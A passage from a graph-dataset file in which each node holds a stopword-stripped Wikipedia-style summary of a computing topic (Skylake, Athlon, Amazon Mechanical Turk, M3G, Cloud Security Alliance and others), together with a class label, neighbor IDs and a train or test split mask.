    "label": 9,
    "text": "Mobile_3D_Graphics_API:mobile 3d graphics api mobile 3d graphics api commonly referred m3g specification defining api writing java programs produce 3d computer graphics extends capabilities java version java platform tailored embedded devices mobile phones pdas object-oriented interface consists 30 classes used draw complex animated three-dimensional scenes m3g developed java community process jsr 184. current version m3g 1.1 version 2.0 development jsr 297 m3g designed meet specific needs mobile devices constricted terms memory processing power often lack fpu graphics hardware gpu api architecture allows implemented completely inside software take advantage hardware present device m3g provides two ways developers draw 3d graphics immediate mode retained mode immediate mode graphics commands issued directly graphics pipeline rendering engine executes immediately using method developer must write code specifically tells rendering engine draw animation frame camera set lights also associated scene necessarily part immediate mode possible display single objects well entire scenes worlds camera lights background parts scene retained mode always uses scene graph links geometric objects 3d world tree structure also specifies camera lights background higher-level information object—such geometric structure position appearance—is retained frame frame m3g standard also specifies file format 3d model data including animation data allows developers create content pcs loaded m3g mobile devices",
    "neighbors": [
      4960,
      10658,
      3561,
      5677,
      9011,
      1461,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 993,
    "label": 9,
    "text": "Metadata_facility_for_Java:metadata facility java metadata facility java specification java defines api annotating fields methods classes particular attributes indicate processed specific ways development tools deployment tools run-time libraries specification developed java community process jsr 175 released part j2se 5.0 tiger",
    "neighbors": [
      4960,
      8262,
      3562,
      6860,
      5677,
      2804,
      2556,
      11582
    ],
    "mask": "None"
  },
  {
    "node_id": 994,
    "label": 3,
    "text": "Binary_Land:binary land famicom version 99 levels ending screen implemented game famicom version game players unite two penguins gurin male malon female love msx version features human boy human girl gameplay remains identical famicom version players control malon gurin simultaneously timer adding difficulty penguins move mirror images game features many different stages completing 17th stage players start stage 1 je te veux erik satie background music game levels upon uniting two penguins beethoven ode joy played top-down view utilized game similar method used adventures lolo standing way spiders birds creatures player must attack penguins spray cobwebs occupy cells playing field possibly slowing player long enough spider kill either gurin malon level arranged 10-by-15 grid vertical wall separating two penguins upper central cell free characters reach free cell always holds caged heart required complete level row walls surrounding player maze-like environment order make challenges difficult unbalanced offer different experience gurin malon gurin malon become trapped cobweb helpless player navigates maze crosses free cell enters penguin side maze free web spraycan player reach high enough score player asked put name list five highest scores session binary land unofficially translated chinese qì é xiānshēng màoxiǎn zhī lǚ another unofficial version translates final fantasy experience chocobos levels translated one early final fantasy dungeons",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 995,
    "label": 3,
    "text": "Memory_dependence_prediction:memory dependence prediction memory dependence prediction technique employed high-performance out-of-order execution microprocessors execute memory access operations loads stores program order predict true dependencies loads stores instruction execution time predicted dependence information processor decide speculatively execute certain loads stores order preventing loads stores executing out-of-order keeping in-order later pipeline memory disambiguation techniques used determine loads stores correctly executed recover using memory dependence predictor keep dependent loads stores order processor gains benefits aggressive out-of-order load/store execution avoids many memory dependence violations occur loads stores incorrectly executed increases performance reduces number pipeline flushes required recover memory dependence violations see memory disambiguation article information memory dependencies memory dependence violations recovery general memory dependence prediction predicts whether two memory operations dependent interact accessing memory location besides using store load raw true memory dependence prediction out-of-order scheduling loads stores applications memory dependence prediction proposed see example memory dependence prediction optimization top memory dependence speculation sequential execution semantics imply stores loads appear execute order specified program however out-of-order execution instructions may possible execute two memory operations different order implied program possible two operations independent memory dependence speculation load may allowed execute store precedes speculation succeeds load independent store two instructions access different memory locations speculation fails load dependent upon store two accesses overlap memory first modern out-of-order designs memory speculation used benefits limited αs scope out-of-order execution increased tens instructions naive memory dependence speculation used naive memory dependence speculation load allowed bypass preceding store form speculation important weight benefits correct speculation penalty paid incorrect speculation scope out-of-order execution increases several tens instructions performance benefits naive speculation decrease retain benefits aggressive memory dependence speculation avoiding costs mispeculation several predictors proposed selective memory dependence prediction stalls specific loads certain violation may occur explicitly predict dependencies predictor may delay loads longer necessary hence result suboptimal performance fact cases performs worse naively speculating loads early possible often faster mispeculate recover wait preceding stores execute exact memory dependence prediction developed university wisconsin–madison specifically dynamic speculation synchronization delays loads long necessary predicting exact store load wait predictor predicts exact dependences store load pair synonym predictor groups together dependences share common load store instruction store sets predictor represents multiple potential dependences efficiently grouping together possible stores load may dependent upon store barrier predictor treats certain store instructions barriers subsequent load store operations allowed bypass specific store store barrier predictor explicitly predict dependencies predictor may unnecessarily delay subsequent yet independent loads memory dependence prediction applications beyond scheduling loads stores example speculative memory cloaking speculative memory bypassing use memory dependence prediction streamline communication values memory memory dependence prediction loads stores analogous branch prediction conditional branch instructions branch prediction branch predictor predicts way branch resolve known processor speculatively fetch execute instructions one paths branch later branch instruction executes determined branch instruction correctly predicted branch misprediction pipeline flush necessary throw away instructions speculatively fetched executed branch prediction thought two step process first predictor determines direction branch taken binary decision predictor determines actual target address similarly memory dependence prediction thought two step process first predictor determines whether dependence determines dependence",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      604,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      709,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      8523,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      7050,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Validation"
  },
  {
    "node_id": 996,
    "label": 9,
    "text": "APT_(programming_language):apt programming language apt automatically programmed tool high-level computer programming language commonly used generate instructions numerically controlled machine tools douglas t. ross considered many father apt head newly created computer applications group servomechanisms laboratory mit 1956 led technical effort apt language system makes numerically controlled manufacturing possible early language used widely 1970s still standard internationally derivatives apt later developed apt used program numerically-controlled machine tools create complex parts using cutting tool moving space used calculate path tool must follow generate desired form apt special-purpose language predecessor modern cam systems created refined late 1950s early 1960s simplify task calculating geometry points tool must traverse space cut complex parts required aerospace industry direct result new numerical control technology becoming available time daunting task machinist engineer faced calculating movements machine complex parts capable development centered mit labs hosted numerical control milling machine projects apt also air force sponsored notable world first major cooperative programming venture combining government agencies universities 14-company team organized within aircraft industries association aerospace ind assoc. apt created graphical interfaces available relies text specify geometry toolpaths needed machine part original version created even fortran available first ansi standard later versions rewritten fortran u. s. government funded project apt placed public domain apt shares many similarities computer programming languages fortran general-purpose computer language takes source text converts statements instructions processed internally computer apt converts source statements programs driving numerically-controlled machine tools output apt processor may cl cutter location file run post-processor specific desired control machine pair resulting file run control machine generate tool motions machine actions commonly file form rs-274 format instructions commonly known g-code derivatives apt developed initially mainly allow programs run minicomputers instead mainframes included adapt ibm exapt germany uniapt initially united computing later used alongside unigraphics cadcam systems machine tool makers systems utilize elements apt day standards developers like step-nc took toolpath curves apt sources apt formed basis two early programming languages robotics rapt robot apt developed university edinburgh school informatics robex derivative exapt",
    "neighbors": [
      4121,
      10458,
      4916
    ],
    "mask": "None"
  },
  {
    "node_id": 997,
    "label": 7,
    "text": "Cloud_Security_Alliance:cloud security alliance cloud security alliance csa not-for-profit organization mission “ promote use best practices providing security assurance within cloud computing provide education uses cloud computing help secure forms computing. ” csa 80,000 individual members worldwide csa gained significant reputability 2011 american presidential administration selected csa summit venue announcing federal government ’ cloud computing strategy csa formed december 2008 coalition individuals saw need provide objective enterprise user guidance adoption use cloud computing initial work product security guidance critical areas focus cloud computing put together wiki-style dozens volunteers 2014 chairman board csa dave cullinane vp global security privacy catalina marketing st petersburg florida former ciso ebay cullinane said application exposed internet allow people make money probed 2009 cloud security alliance incorporated nevada corporation achieved us federal 501 c 6 non-profit status registered foreign non-profit corporation washington csa works support number global policy makers focus cloud security initiatives including national institute standards technology nist european commission singapore government various data protection authorities march 2012 csa selected partner three europe ’ largest research centers cern embl esa launch helix nebula – science cloud cloud security alliance employs roughly sixty full-time contract staff worldwide several thousand active volunteers participating research working groups chapters time according csa member-driven organization chartered promoting use best practices providing security assurance within cloud computing providing education uses cloud computing help secure forms computing individuals interested cloud computing experience assist making secure receive complimentary individual membership based minimum level participation cloud security alliance network chapters worldwide chapters separate legal entities cloud security alliance operate within guidelines set cloud security alliance united states chapters may elect benefit non-profit tax shield cloud security alliance chapters encouraged hold local meetings participate areas research chapter activities coordinated cloud security alliance worldwide separate legal entities europe asia pacific called cloud security alliance europe scottish company united kingdom cloud security alliance asia pacific ltd singapore legal entity responsible overseeing cloud security alliance-related activities respective regions legal entities operate agreement cloud security alliance give oversight power separate boards directors companies limited guarantee managing directors members executive team cloud security alliance cloud security alliance 25+ active working groups key areas research include cloud standards certification education training guidance tools global reach driving innovation",
    "neighbors": [
      6945,
      774,
      6344,
      7600,
      433,
      1907,
      3190,
      11159,
      7352
    ],
    "mask": "Test"
  },
  {
    "node_id": 998,
    "label": 2,
    "text": "List_of_products_based_on_FreeBSD:list products based freebsd many products based freebsd information products version freebsd based often difficult come since fact widely publicised",
    "neighbors": [
      7552,
      7425,
      10202,
      2180,
      1400,
      2564,
      1927,
      1801,
      7561,
      10761,
      274,
      8467,
      9625,
      1946,
      4636,
      11506,
      2212,
      6438,
      10535,
      684,
      4908,
      1071,
      3248,
      9009,
      11698,
      11573,
      1718,
      9784,
      1465,
      5177,
      5819,
      9277,
      3006,
      704,
      3520,
      11459,
      3652,
      9927,
      6858,
      8266,
      8395,
      8909,
      5710,
      6864,
      7249,
      850,
      10455,
      3673,
      6361,
      6491,
      8410,
      9306,
      9817,
      607,
      3551,
      7521,
      9055,
      1891,
      4073,
      8937,
      9452,
      8304,
      2545,
      3058,
      7027,
      8816,
      2421,
      9201,
      1015,
      2424,
      1273,
      9844,
      5371,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 999,
    "label": 4,
    "text": "National_Information_Assurance_Training_and_Education_Center:national information assurance training education center national information assurance training education center niatec american consortium academic industry government organizations improve literacy awareness training education standards information assurance serves develop professionals ia expertise various disciplines ultimately contributes protection national information infrastructure niatec associated idaho state university national security agency center academic excellence information assurance education centers academic excellence niatec components plan establish federal cyber-corps defend cyber-based disruption attacks niatec active development training standards associated national institute standards technology special publication 800-16 committee national security systems instructions 4011 4012 4013 4014 4015 4016 dr. corey schou director niatec dr. james frost associate director group subscribes isc ² code ethics",
    "neighbors": [
      3552,
      612,
      5636,
      8613,
      7528,
      11567,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1000,
    "label": 3,
    "text": "Skylake_(microarchitecture):skylake microarchitecture skylake codename used intel processor microarchitecture launched august 2015 succeeding broadwell microarchitecture skylake microarchitecture redesign using 14 nm manufacturing process technology predecessor serving tock intel tick–tock manufacturing design model according intel redesign brings greater cpu gpu performance reduced power consumption skylake cpus share microarchitecture kaby lake coffee lake cannon lake cpus skylake last intel platform windows earlier windows 10 officially supported microsoft although enthusiast-created modifications exist allow windows 8.1 earlier continue receive updates later platforms processors based skylake microarchitecture marketed 6th-generation core intel officially end life discontinued skylake lga 1151 cpus march 4 2019 skylake development processors banias dothan conroe sandy bridge ivy bridge primarily undertaken intel israel engineering research center haifa israel haifa development team worked project four years faced many challenges re-writing microarchitecture developing new concepts speed shift technology created processor 4.5 w 45 w mobile devices 91 w desktop devices skylake processors used power wide range devices fanless laptops way desktops skylake features companies able release laptop pcs half thick half heavy five years ago according intel september 2014 intel announced skylake microarchitecture intel developer forum san francisco volume shipments skylake cpus scheduled second half 2015 also skylake development platform announced available q1 2015 announcement intel also demonstrated two computers desktop mobile skylake prototypes first desktop testbed system running latest version 3dmark second computer fully functional laptop playing 4k video initial batch skylake cpu models 6600k 6700k announced immediate availability gamescom august 5 2015 unusually soon release predecessor broadwell suffered launch delays intel acknowledged 2014 moving 22 nm haswell 14 nm broadwell difficult process develop yet causing broadwell planned launch slip several months yet 14 nm production back track full production q3 2014 industry observers initially believed issues affecting broadwell would also cause skylake slip 2016 intel able bring forward skylake release shorten broadwell release cycle instead result broadwell architecture unusually short run officially intel supported overclocking k x versions skylake processors however later discovered non-k chips could overclocked modifying base clock value – process made feasible base clock applying cpu ram integrated graphics skylake beta uefi firmware updates motherboard vendors asrock prominently promoted name sky oc allowed base clock modified manner february 2016 however asrock firmware update removed feature february 9 2016 intel announced would longer allow overclocking non-k processors issued cpu microcode update removes function april 2016 asrock started selling motherboards allow overclocking unsupported cpus using external clock generator january 2016 microsoft announced would end support windows 7 windows 8.1 skylake processors effective july 17 2017 date critical updates two operating systems would released skylake users judged affect reliability os older hardware windows 10 would microsoft windows platform officially supported skylake well future intel cpu microarchitectures beginning skylake successor kaby lake terry myerson stated microsoft make large investment order reliably support skylake older versions windows future generations processors would require investments microsoft also stated due age platform would challenging newer hardware firmware device driver combinations properly run windows 7 march 18 2016 response criticism move primarily enterprise customers microsoft announced revisions support policy changing cutoff support non-critical updates july 17 2018 stating skylake users would receive critical security updates windows 7 8.1 end extended support august 2016 citing strong partnership oem partners intel microsoft stated would continue fully support 7 8.1 skylake end respective lifecycles addition enthusiast-created modification released disabled windows update check allowed windows 8.1 earlier continue updated later platforms linux kernel 4.10 skylake mobile power management reasonably good shape package c states supported seeing use case cause likely bugs system firmware particular computer might resolved updating bios user easily optimize power management beyond linux default settings powertop utility use lennart poettering systemd powertop provides service start computer auto-tune various settings reduce power usage linux 4.11 enables frame-buffer compression integrated graphics chipset default lowers power consumption battery runtime similar windows 10 possibly better improvements still made skylake fully supported openbsd 6.2 later including accelerated graphics like predecessor broadwell skylake available five variants identified suffixes skl-s x skl-x h skl-h u skl-u skl-y skl-s skl-x contain overclockable k x variants unlocked multipliers h u variants manufactured ball grid array bga packaging x variants manufactured land grid array lga packaging using new socket lga 1151 lga 2066 skylake x skylake used conjunction intel 100 series chipsets also known sunrise point major changes haswell skylake architectures include removal fully integrated voltage regulator fivr introduced haswell variants use discrete platform controller hub pch direct media interface dmi 2.0 replaced dmi 3.0 allows speeds 8 gt/s skylake u variants support one dimm slot per channel h variants support two dimm slots per channel skylake launch sales lifespan occur time ongoing sdram market transition ddr3 sdram memory gradually replaced ddr4 memory rather working exclusively ddr4 skylake microarchitecture remains backward compatible interoperating types memory accompanying microarchitecture support memory standards new so-dimm type capable carrying either ddr3 ddr4 memory chips called unidimm also announced skylake p variants reduced on-die graphics unit 12 execution units enabled instead 24 execution units direct counterparts see table contrast ivy bridge cpus p suffix used cpus completely disabled on-die video chipset enhancements include thunderbolt 3.0 sata express iris pro graphics direct3d feature level 12_1 128 mb l4 edram cache certain skus skylake line processors retires vga support supporting five monitors connected via hdmi 1.4 displayport 1.2 embedded displayport edp interfaces hdmi 2.0 4k 60 hz supported motherboards equipped intel ’ alpine ridge thunderbolt controller skylake instruction set changes include intel mpx memory protection extensions intel sgx software guard extensions future xeon variants also advanced vector extensions 3.2 avx-512f skylake-based laptops may use wireless technology called rezence charging wireless technologies communication peripherals many major pc vendors agreed use technology skylake-based laptops released end 2015 integrated gpu skylake variant supports windows directx 12 feature level 12_1 opengl 4.6 latest windows 10 driver update opengl 4.5 linux opencl 2.0 standards well modern hardware video encoding/decoding formats vp9 gpu accelerated decode vp8 hevc hardware accelerated 8-bit encode/decode gpu accelerated 10-bit decode intel also released unlocked capable overclocking mobile skylake cpus unlike previous generations skylake-based xeon e3 longer works desktop chipset supports socket requires either c232 c236 chipset operate short loops specific combination instruction use may cause unpredictable system behavior cpus hyperthreading microcode update issued fix issue skylake vulnerable spectre attacks fact vulnerable processors uses indirect branch speculation indirect branches also return prediction stack underflows pause latency increased dramatically cause issues older programs libraries using pause instructions skylake processors produced five main families u h x multiple configurations available within family common features mainstream desktop skylake cpus common features high performance skylake-x cpus see also server mobile mobile workstation processors e3 series server chips consist system bus 9 gt/s max memory bandwidth 34.1 gb/s dual channel memory unlike predecessor skylake xeon cpus require either c232 c236 chipset operate",
    "neighbors": [
      7173,
      4108,
      9741,
      5649,
      2088,
      1085,
      2638,
      597,
      1119,
      1122,
      613,
      7783,
      4204,
      8820,
      630,
      4217,
      8325,
      6797,
      7313,
      8851,
      6804,
      9391,
      4276,
      2237,
      5309,
      6339,
      5844,
      11487,
      1260,
      5356,
      4334,
      5871,
      3317,
      5883,
      5380,
      2821,
      5386,
      4886,
      3352,
      9500,
      10019,
      1832,
      2350,
      10548,
      833,
      5444,
      9541,
      3403,
      2383,
      9582,
      4465,
      10620,
      5503,
      2943,
      3457,
      3459,
      9092,
      3973,
      9095,
      9611,
      398,
      5523,
      9111,
      10669,
      10675,
      1461,
      8125,
      8126,
      1998,
      977,
      2514,
      5073,
      2516,
      2525,
      7134,
      5606,
      7657,
      8684,
      10734,
      499,
      4603
    ],
    "mask": "Test"
  },
  {
    "node_id": 1001,
    "label": 8,
    "text": "Amazon_Mechanical_Turk:amazon mechanical turk amazon mechanical turk mturk crowdsourcing website businesses known requesters hire remotely located crowdworkers perform discrete on-demand tasks computers currently unable operated amazon web services owned amazon employers post jobs known human intelligence tasks hits identifying specific content image video writing product descriptions answering questions among others workers colloquially known turkers crowdworkers browse among existing jobs complete exchange rate set employer place jobs requesting programs use open application programming interface api limited mturk requester site april 2019 requesters could register 49 approved countries service initially conceived venky harinarayan us patent filed 2001 amazon coined term artificial artificial intelligence processes outsourcing parts computer program humans tasks carried much faster humans computers claimed jeff bezos responsible concept led amazon mechanical turk developed realize process name mechanical turk inspired turk 18th-century chess-playing automaton made wolfgang von kempelen toured europe beating napoleon bonaparte benjamin franklin later revealed machine automaton fact human chess master hidden cabinet beneath board controlling movements humanoid dummy likewise mechanical turk online service uses remote human labour hidden behind computer interface help employers perform tasks possible using true machine mturk launched publicly november 2 2005 following launch mechanical turk user base grew quickly early- mid-november 2005 tens thousands jobs uploaded system amazon internal tasks required human intelligence hit types expanded include transcribing rating image tagging surveys writing march 2007 reportedly 100,000 workers 100 countries increased 500,000 registered workers 190 countries january 2011 year techlist published interactive map pinpointing locations 50,000 mturk workers around world 2018 research demonstrated 100,000 workers available platform time around 2000 actively working user mechanical turk either worker contractor requester employer workers access dashboard displays three sections total earnings hit status hit totals workers set hours obligation accept particular task workers paid contractors rather employees n't file forms pay payroll taxes however benefit laws stipulating conditions regarding minimum wage overtime workers compensation workers must report income self-employment income average wage multiple microtasks assigned performed quickly one dollar hour task averaging cents workers postal address anywhere world payment completing tasks redeemed amazon.com via gift certificate gift certificates payment option available international workers apart india later transferred worker u.s. bank account requesters ask workers fulfill qualifications engaging task set test order verify qualification also accept reject result sent worker affects worker reputation april 2019 requesters paid amazon minimum 20 commission price successfully completed jobs increased amounts additional services requesters use amazon mechanical turk api programmatically integrate results work directly business processes systems employers set job must specify well specific details job want completed workers primarily located united states since platform inception demographics generally similar overall internet population us 2010 cash payments indian workers introduced gave new updated results demographics workers remained primarily within united states researcher behind statistics runs website showing worker demographics updated hourly may 2015 showed 80 workers located united states remaining 20 located elsewhere world india may 2019 showed approximately 60 workers located united states 40 located elsewhere world approximately 30 india since 2007 service used search prominent missing individuals first suggested search james kim body found technical progress made summer computer scientist jim gray disappeared yacht amazon werner vogels personal friend made arrangements digitalglobe provides satellite data google maps google earth put recent photography farallon islands mechanical turk front-page story digg attracted 12,000 searchers worked imaging professionals data search unsuccessful september 2007 similar arrangement repeated search aviator steve fossett satellite data divided 85 squared meter sections mechanical turk users asked flag images foreign objects might crash site evidence examined closely search also unsuccessful satellite imagery mostly within 50-mile radius crash site eventually found hikers year later 65 miles away beginning 2010 numerous researchers explored viability mechanical turk recruit subjects social science experiments thousands papers rely data collected mechanical turk workers published year including hundreds top ranked academic journals researchers generally found samples respondents obtained mechanical turk perfectly match relevant characteristics u.s. population 're wildly misrepresentative either general consensus among researchers service works best recruiting diverse sample less successful studies require precisely defined populations require representative sample population whole however concerns proprietary selection algorithm may prejudice results see research validity overall u.s. mturk population mostly female white somewhat younger educated u.s. population overall data collected jobs conducted since 2013 show u.s. population longer predominantly female workers currently slightly likely male cost mturk considerably lower means conducting surveys workers willing complete tasks less half u.s. minimum wage addition receiving growing interest social sciences mturk also used tool artistic creation one first artists work mechanical turk xtine burrough mechanical olympics 2008 endless om 2015 mediations digital labor another early work artist aaron koblin ten thousand cents 2008 supervised machine learning algorithms require large amounts human-annotated data trained successfully machine learning researchers hired workers mechanical turk produce datasets squad question answering dataset programmers developed various browser extensions scripts designed simplify process completing jobs amazon stated disapprove scripts completely automate process preclude human element concern task completion process e.g answering survey could gamed random responses resultant collected data could worthless accounts using so-called automated bots banned services extend capabilities mturk amazon makes available application programming interface api give users another access point mturk system mturk api lets programmer access numerous aspects mturk like submitting jobs retrieving completed work approving rejecting work 2017 amazon launched support aws software development kits sdk allowing nine new sdks available mturk users mturk accessible via api following languages python javascript java .net go ruby php c++ web sites web services use api integrate mturk work web applications providing users alternatives interface amazon built functions amazon mechanical turk provides platform processing images task well-suited human intelligence requesters created tasks asking workers label objects found image select relevant picture group pictures screen inappropriate content classify objects satellite images also crowdworkers completed tasks digitizing text images scanned forms filled hand companies large online catalogues use mechanical turk identify duplicates verify details item entries examples fixing duplicates identifying removing duplicates yellow pages directory listings online product catalog entries examples verifying details include checking restaurant details e.g phone number hours finding contact information web pages e.g author name email diversification scale personnel mechanical turk allow collecting amount information would difficult outside crowd platform mechanical turk allows requesters amass large number responses various types surveys basic demographics academic research uses include writing comments descriptions blog entries websites searching data elements specific fields large government legal documents companies use mechanical turk crowd labor understand respond different types data common uses include editing transcription podcasts translation matching search engine results validity research conducted mechanical turk worker pool questioned large part due proprietary method mechanical turk uses select workers since method selection shared researchers researchers know true demographics pool participants unclear whether mechanical turk uses fiscal political educational limiters selection process may invalidate surveys research done using mechanical turk worker pool mechanical turk widely criticized interactions use labour computer scientist jaron lanier notes design mechanical turk allows think people software components conjures sense magic pluck results cloud incredibly low cost survey done researchers university texas showed surveyed workers motivated enjoyment self-fulfillment. results may prejudiced mturk worker selection algorithms 2016 pew research study found quarter online gig workers like work mechanical turk limited employment opportunities live tasks typically simple repetitive users paid often cents complete criticized mechanical turk exploiting compensating workers true value task complete minimum payment amazon allows task one cent market tasks competitive tasks available form employment particularly less educated need provide lack opportunities many workers accept low compensation completion tasks study 3.8 million tasks completed 2,767 workers amazon mechanical turk showed “ workers earned median hourly wage 2 hour ” 4 percent workers earning 7.25 per hour since workers considered independent contractors protected fair labor standards act guarantees minimum wage 2018 increasing number workers competing site reduced total amount work available workers search tasks receive compensation receive additional compensation task takes longer estimated requester nation magazine said 2014 requesters taken advantage workers tasks rejecting submissions order avoid paying facebook–cambridge analytica data scandal mechanical turk one means covertly gathering private information massive database system paid persons dollar two install facebook connected app answer personal questions survey task work hire used demographic psychological research project might seemed purpose instead bait worker reveal personal information worker identity already collected facebook mechanical turk others criticized marketplace ability workers negotiate employers response growing criticisms payment evasion lack representation group developed third party platform called turkopticon allows workers give feedback employers allowing users avoid potentially shady jobs recommend superior employers another platform called dynamo created allow workers collect anonymously organize campaigns better work environment including guidelines academic requesters dear jeff bezos campaign amazon made harder workers enroll dynamo closing request account provided workers required code dynamo membership amazon installed updates prevent plugins identify high quality human intelligence tasks functioning website additionally worker complaints amazon payment system occasion stop working major issue workers requiring daily payments mturk comparable respects discontinued google answers service however mechanical turk general marketplace potentially help distribute kind work tasks world collaborative human interpreter chi philipp lenssen also suggested using distributed human intelligence help computer programs perform tasks computers well mturk could used execution engine chi russian search giant yandex developed similar system called yandex.toloka",
    "neighbors": [
      8962,
      8451,
      519,
      6027,
      4236,
      10893,
      911,
      1935,
      4623,
      8592,
      2965,
      8983,
      2328,
      4377,
      8986,
      2588,
      5660,
      10525,
      11038,
      6307,
      11556,
      9766,
      5159,
      2217,
      6444,
      8495,
      3121,
      9780,
      7352,
      10681,
      2496,
      4289,
      11201,
      1224,
      5960,
      8520,
      10185,
      4429,
      590,
      7248,
      1362,
      467,
      9682,
      10452,
      7512,
      8921,
      735,
      6367,
      5857,
      4194,
      11646,
      5732,
      1001,
      3434,
      3819,
      7660,
      10090,
      6260,
      8181,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 1002,
    "label": 3,
    "text": "Rollerball_(video_game):rollerball video game pinball machine rendered rollerball composed four screens proportion would long two standard pinball tables real table graphics two four screens based various aspects new york city skyline topmost screen hereafter called bonus screen merely shows clouds blimp second screen main screen shows top empire state building third screen intermediate shows lower skyline statue liberty lowest final screen shows blue backdrop representing ocean main mode player launches ball directly main screen top small loop marked slot player sends ball loop slot machine display center screen cycles various penalties rewards given one three symbols eggplant pair cherries bell appears three times center slot loop open allowing player enter bonus screen pair kickback holes upper left main screen bumper proximity upper one lower one shoot ball straight relying curvature wall direct upper hole player lucky ball falls upper hole one two things happen kickback slot bonus screen empty ball transferred slot another ball released plunger enter play kickback slot already filled ball relaunched lower hole intermediate screen viable way returning main screen kickback hole upper left screen initially fires main screen entered switches directions every time used player gets three cherries main screen slot hole always shoot ball upwards otherwise chances score screen desirable place ball three sets three drop targets set three slots game begins light letter lit first slot one set three drop targets chosen marked flashing green light additionally bonus tally screen begins 3,000 points completing set drop targets increases bonus tally sending ball slot light lit one move light flipping flippers adds current tally player score lower screen however least desirable place ball officially drained screen however options still available player bonus screen player must shoot ball seven sensors letters phrase sky high written random forced order player must shoot ball flashing letter light activate passing non-flashing already activated letters effect done ball placed kickback hole top screen letters turn bumpers must hit numerous times remove start bonus game successfully finishing bonus gives player large sum points well extra ball first time completed increase bonus multiplier completion two sets four targets similar drop targets top corners bonus screen activated upper left targets labeled raise saver place stopper gap left wall left flipper apparatus upper right targets labeled open gate open kickback slot lower right corner locking ball kickback slot send ball play part two-ball multiball event bonus game enabled slot opened ball already locked locked ball kick entering ball back play ball passes flippers lower screen either side flippers drained end-of-ball bonus calculated tally current bonus kept gameplay shown lower screen bonus starts 1,000 points increased intervals 1,000 points play upon draining ball bonus counted 0 points added player score represent increase bonus multiplier count repeated bonus multiplier increased finishing bonus game receiving three cherries three bells main screen slot machine game ends three balls addition extra balls bonus screen drained typical final score around 300,000 points scoring 1,000,000 points enables credits final ball drained alternate mode two-player game called match play mode much smaller table one screen tall houses number buttons switches lower score player side various amounts four sensors middle table switch scores two players whenever become lit slot machine spun buttons outer walls bonus enacted hitting button top wall first player lose points loses two animals middle player area show emotion ecstasy sadness neutral indifference depending player score score margin two players japanese version left player animal elephant right player giraffe english version giraffe changed donkey likely reference republican democratic u.s. political parties",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 1003,
    "label": 3,
    "text": "Stardust_(1987_video_game):stardust 1987 video game stardust top-scrolling shoot 'em developed spanish studio topo soft released uk kixx 1987 zx spectrum full version included sinclair user covertape 1991 also released amstrad cpc dos msx title screen included music composed pablo toledo music later re-used game bronx player controls small space ship called astrohunter flies surface series large enemy supercruisers way attack earth player must avoid destroy various ground targets free-flying drones order eventually reach array shield generators ship equipped gun improved collecting power-ups second weapon targets objects ground supercruisers passed astrohunter lands enemy starship pilot continues foot reach shield generators destroying generators pilot must returned ship escape",
    "neighbors": [
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 1004,
    "label": 7,
    "text": "Twelve-Factor_App_methodology:twelve-factor app methodology twelve-factor app methodology methodology building software service applications best practices designed enable applications built portability resilience deployed web methodology drafted developers heroku first presented adam wiggins circa 2011 number commentators argued relevance twelve-factor app concept limited heroku twelve factors however cited baseline adapt extend since least 2014 guidelines least one open source project refer developers twelve factor app methodology principles good app design",
    "neighbors": [
      1952,
      4802,
      467,
      8495
    ],
    "mask": "None"
  },
  {
    "node_id": 1005,
    "label": 3,
    "text": "Athlon:athlon athlon brand name applied series x86-compatible microprocessors designed manufactured advanced micro devices amd original athlon called athlon classic first seventh-generation x86 processor first desktop processor reach speeds one gigahertz ghz made debut june 23 1999 amd continued using athlon name 64-bit athlon 64 architecture athlon ii accelerated processing unit apu chips targeting socket am1 desktop soc architecture socket am4 zen microarchitecture athlon comes ancient greek athlon meaning sport contest prize contest place contest arena amd founder then-ceo jerry sanders aggressively pursued strategic partnerships engineering talent late 1990s build earlier successes pc market amd k6 line processors one major partnership announced 1998 paired amd semiconductor giant motorola co-develop copper-based semiconductor technology resulted k7 project first commercial processor utilize copper fabrication technology announcement sanders referred partnership creating virtual gorilla would enable amd compete intel fabrication capacity limiting amd financial outlay new facilities k7 design team led dirk meyer worked lead engineer dec multiple alpha microprocessors employment dec dec sold compaq 1998 company discontinued alpha processor development sanders approached many alpha engineering staff compaq/dec wound semiconductor business able bring nearly alpha design team k7 engineering design team thus consisted previously acquired nexgen k6 team already including engineers vinod dham nearly complete alpha design team august 1999 amd released athlon k7 processor working motorola amd able refine copper interconnect manufacturing production stage one year intel revised process permitted 180-nanometer processor production accompanying die-shrink resulted lower power consumption permitting amd increase athlon clock speeds 1 ghz range yields new process exceeded expectations permitting amd deliver high speed chips volume march 2000 athlon architecture also used ev6 bus licensed dec main system bus intel required licensing use gtl+ bus used slot 1 pentium ii later processors licensing ev6 bus used alpha line processors dec amd able develop chipsets motherboards avoid dependent licensing direct competitor internally athlon fully seventh generation x86 processor first kind like amd k5 k6 athlon dynamically buffers internal micro-instructions runtime resulting parallel x86 instruction decoding cpu out-of-order design like previous post-5x86 amd cpus athlon utilizes alpha 21264 ev6 bus architecture double data rate ddr technology means 100 mhz athlon front side bus actually transfers rate similar 200 mhz single data rate bus referred 200 